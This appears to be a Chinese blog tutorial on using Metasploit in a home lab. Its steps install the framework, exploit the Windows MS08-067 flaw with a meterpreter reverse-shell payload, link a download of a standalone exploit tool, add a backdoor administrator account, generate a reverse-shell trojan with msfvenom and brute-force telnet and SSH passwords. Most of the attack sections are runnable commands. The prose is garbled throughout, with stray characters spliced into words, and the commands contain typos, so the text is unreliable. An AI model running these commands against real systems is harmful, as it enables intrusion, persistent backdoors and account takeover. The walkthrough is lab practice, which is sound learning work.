滲透測(cè)試框架Metasploit功能眾多,它可以幫助用戶識(shí)別安全問題弊知,驗(yàn)證漏洞的緩解措施握牧,并對(duì)某些軟件進(jìn)行安全性評(píng)估容诬,提供真正的安全風(fēng)險(xiǎn)情報(bào)。
一沿腰、安裝metasploit
在kali系統(tǒng)使用metasploit時(shí)览徒,啟動(dòng)發(fā)生故障,所以將其卸載重裝
apt-get remove metasploit-framework
apt-get install metasploit-framework
重裝失敗颂龙,顯示找不到需要的軟件习蓬,更換source源后重新安裝。
vim /etc/apt/sources.list
添加這兩行
deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free
apt-get update
apt-get install metasploit-framework
安裝成功措嵌。
啟動(dòng):
二躲叼、metasploit利用系統(tǒng)漏洞進(jìn)行攻擊
msfconsole
>show
>use exploit/windows/smb/ms08_067_netapi
>show options
>set RHOST 192.168.252.131 //RHOST是目標(biāo)地址
>set PAYLOAD windows/meterpreter/reverse_tcp
>set LHOST 192.168.252.136
>exploit //或run,用來執(zhí)行企巢,本例執(zhí)行肯定不成功枫慷,因?yàn)閙s08_067是windows漏洞,我131上裝的是centos浪规。只是用來演示一下過程
ps:windows MS08067漏洞介紹
MS08067遠(yuǎn)程溢出漏洞是由于windows系統(tǒng)中RPC存在缺陷造成的或听,windows系統(tǒng)的server服務(wù)在處理特別RPC請(qǐng)求時(shí)存在緩沖區(qū)溢出漏洞,遠(yuǎn)程攻擊者可以通過發(fā)送惡意的RPC請(qǐng)求觸發(fā)這個(gè)溢出笋婿,如果受影響的系統(tǒng)收到了特制偽造的RPC請(qǐng)求誉裆,可能允許遠(yuǎn)程執(zhí)行代碼,導(dǎo)致完全入侵用戶系統(tǒng)萌抵,以SYSTEM權(quán)限執(zhí)行任意指令并獲取數(shù)據(jù)找御,并獲取對(duì)該系統(tǒng)的控制權(quán),造成系統(tǒng)失竊及系統(tǒng)崩潰等嚴(yán)重問題绍填。
1.工具——MS08067.exe 攻擊命令MS08067.exe 192.168.1.3霎桅,向遠(yuǎn)程主機(jī)發(fā)送一串特殊構(gòu)造的數(shù)據(jù)包,使目標(biāo)主機(jī)產(chǎn)生內(nèi)存溢出讨永,程序跳轉(zhuǎn)到shellcode代碼處執(zhí)行滔驶,shellcode代碼在目標(biāo)主機(jī)上開啟4444端口,等待連接卿闹;
工具下載:https://pan.baidu.com/s/1WD6GOT_gTBm6Ahyk45jmRg
提取碼:6cfu
也可以使用像上面一樣使用metasploit進(jìn)行攻擊測(cè)試揭糕。
2.連接遠(yuǎn)程主機(jī)并添加用戶 telnet 192.168.1.3 4444
成功連接目標(biāo)主機(jī),輸入命令ipconfig
添加用戶 net user aaa 123456 /add
把用戶aaa添加到管理員組 net localgroup administrators aaa /add
確認(rèn)aaa是否在管理員組 net user aaa
3.用戶aaa遠(yuǎn)程連接目標(biāo)主機(jī) 開始——運(yùn)行——mstsc 锻霎,輸入ip著角、賬號(hào)、密碼
三旋恼、使用metasploit自己制作木馬吏口,并利用起來
1.根據(jù)自己的ip生成一個(gè)木馬
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.252.136 lPORT=55555 X >test.ext
2.將制作好的test.exe文件發(fā)送到靶機(jī)上(需要windows xp或03系統(tǒng))
3.使用
use exploit/multi/handler //使用handle模塊
set PAYLOAD windows/meterpreter/reverse_tcp //使用這個(gè)shellcode
set LHOST 192.168.252.136
set LPORT 55555
exploit //打開后,在靶機(jī)上雙擊test.exe,監(jiān)測(cè)
四产徊、使用metasploit掃描弱口令
use auxiliary/scanner/telnet/telnet_login //使用telnet爆破模塊
set user_file user.txt //設(shè)置用戶名字典
set pass_file user.txt //設(shè)置密碼字典
set rhosts IP //我這里用的是真實(shí)的服務(wù)器地址昂勒,所以馬掉了
run
嘗試爆破telnet弱口令
五、使用metasploit爆破ssh弱口令
本機(jī)ip:192.168.252.136
靶機(jī)ip:192.168.252.128
事先編輯好賬號(hào)字典user.txt和密碼字典password.txt
故意在靶機(jī)上設(shè)置弱口令root:ll123456和dazhutizi:123.
嘗試爆破
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
user_file => user.txt
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
user_file => user.txt
msf auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_login) > run
但是普通用戶dazhutizi的密碼卻沒有爆出來舟铜,仔細(xì)查看結(jié)果戈盈,發(fā)現(xiàn)原來我之前在128上做了設(shè)置,使遠(yuǎn)程登錄輸錯(cuò)三次密碼后將用戶進(jìn)行鎖定==
按照我編輯的賬號(hào)和密碼本谆刨,root剛好嘗試了三次就登錄成功了塘娶,而其他普通用戶都被鎖定了==(鎖定方法:http://www.reibang.com/p/8c69cc00bbff)
將其解鎖,再嘗試成功
參考:http://www.freebuf.com/sectool/67685.html
metasploit使用命令參考:https://www.cnblogs.com/lsgxeva/p/8450277.html